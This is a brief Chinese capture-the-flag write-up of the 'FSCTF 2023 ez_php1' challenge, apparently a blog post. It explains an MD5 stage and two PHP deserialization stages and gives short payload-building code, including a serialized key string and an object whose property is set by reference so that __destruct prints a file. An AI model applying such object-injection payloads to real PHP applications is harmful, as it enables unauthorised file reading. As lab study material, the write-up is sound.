[FSCTF 2023]ez_php1

一共有三小关

第一关:md5加密

第二关:反序列化

重点 单个字符串序列化 unserialize($str) === "$KEY"

php 复制代码
<?php
$KEY="YES I love";

echo serialize($KEY);

s:10:"YES I love";

第三关: 反序列化

把a的地址赋给b,因为在__destruct()中有echo,可以输出文件内容。

php 复制代码
$c=new Clazz();
$c->b=&$c->a;
echo serialize($c);
相关推荐
云水一下7 小时前
零基础玩转bWAPP靶场(六十七):Cross-Domain Policy File (Flash)
web安全·flash·bwapp
4SAPI7 小时前
企业大模型API服务商推荐:从多模型接入到AI API Gateway的技术选型分析
人工智能·php
m0_6957688010 小时前
CVE-2017-9442 靶场详解
网络安全
子非鱼a13 小时前
【WEB】[NewStarCTF 2023 公开赛道]include 0。0
php
DevUp14 小时前
停更老站往哪搬:PHP 老站的五条出路(番外七)
php·cms
聚铭网络16 小时前
聚铭网络入选2026年度连云港市网络和数据安全应急支撑服务机构并获授牌
网络安全
@我漫长的孤独流浪17 小时前
计算机网络与信息安全
计算机网络·网络安全
白猫不黑17 小时前
CTF是什么?从零理解一场攻防竞赛
网络·web安全·计算机·网络安全·信息安全·ctf·红蓝对抗
专业程序开发源17 小时前
springboot旅游推荐系统82074-计算机课程设计、毕业设计
java·vue.js·spring boot·后端·php·课程设计·旅游
学习3人组17 小时前
XSS跨站脚本攻击攻击案例拆解-网络安全系列
网络安全